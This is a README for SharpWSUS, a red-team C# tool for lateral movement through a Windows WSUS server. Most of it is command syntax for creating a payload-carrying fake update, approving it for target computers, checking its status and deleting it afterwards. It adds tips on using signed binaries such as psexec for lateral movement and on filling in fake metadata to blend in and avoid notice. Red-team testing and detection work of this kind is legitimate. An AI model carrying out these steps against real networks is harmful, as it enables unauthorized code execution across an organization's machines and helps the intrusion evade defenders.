SharpWSUS is a CSharp tool for lateral movement through WSUS. There is a corresponding blog (https://labs.nettitude.com/blog/introducing-sharpwsus/) which has more detailed information about the tooling, use case and detection.
Massive credit to the below resources that really did 90% of this for me. This tool is just an enhancement of the below for C2 reliability and flexibility.
- https://github.com/AlsidOfficial/WSUSpendu – powershell tool for abusing WSUS
- https://github.com/ThunderGunExpress/Thunder_Woosus – Csharp tool for abusing WSUS
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _ / / ___|| | | / ___|
___ | '_ / _` | '__| '_ / / /___ | | | ___
___) | | | | (_| | | | |_) V V / ___) | |_| |___) |
|____/|_| |_|__,_|_| | .__/ _/_/ |____/ ___/|____/
Phil Keeble @ Nettitude Red Team
Commands listed below have optional parameters in <>.
Locate the WSUS server:
Inspect the WSUS server, enumerating clients, servers and existing groups:
Create an update (NOTE: The payload has to be a windows signed binary):
SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MS RC] /description:[description] /url:[url]>
Approve an update:
SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>
Check status of an update:
SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]
Delete update and clean up groups added:
SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>
- Binary has to be windows signed, so psexec, msiexec, msbuild etc could be useful for lateral movement.
- The metadata on the create command is not needed, but is useful for blending in to the environment.
- If testing in a lab the first is usually quick, then each subsequent update will take a couple hours (this is due to how windows evaluates whether an update is installed already or not)
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.